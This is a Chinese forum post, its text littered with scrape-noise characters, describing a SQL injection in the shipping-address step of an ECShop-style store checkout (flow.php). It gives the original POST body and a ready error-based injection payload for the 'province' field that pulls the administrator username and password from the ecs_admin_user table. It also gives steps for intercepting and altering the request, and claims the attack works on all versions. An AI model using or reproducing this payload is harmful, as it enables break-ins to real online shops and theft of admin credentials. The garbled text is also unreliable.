感谢欠杀的黑盒# P1 K3 q; }$ Q4 F2 [
8 e- \2 z5 m- L$ c % n' u# q6 w* e
把任意商品加入购物车在填写配送地址那一页,有地区选择
/ }0 h2 c+ N8 e& y; Z$ V
% n9 G/ J3 S! y L1 Dflow.php?step=consignee&direct_shopping=1
7 u) |1 B3 F* w比如省选择安徽; ~( P9 o1 U" C2 f
* s/ |$ B6 R- E7 u8 D: M
其中POST数据如下
" n- Y6 Z- Q0 G' L
& J7 D: z% ]- [/ {8 xcountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3* B( R) T! Q( _% r, D, J _
改成
% v( z+ j, f/ I( K- X) V( u( [ # G$ g. o9 |+ ?& B
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
0 ^9 M) j' q/ V; Aps:详细的方法,用火狐tamper data插件……..即可改post内容…..
3 ?6 ]3 @3 [& h9 Q2 r: j/ K
# W; P; F% z4 U; J/ }先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包. ^' x( X( x3 Y
- e) m/ {- N' b1 _就会回显错误页面了。。。。2 i% W5 f0 J7 B) i' V. }
7 X0 P! ^6 G% o! E我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
3 \* H( D3 T3 A6 m |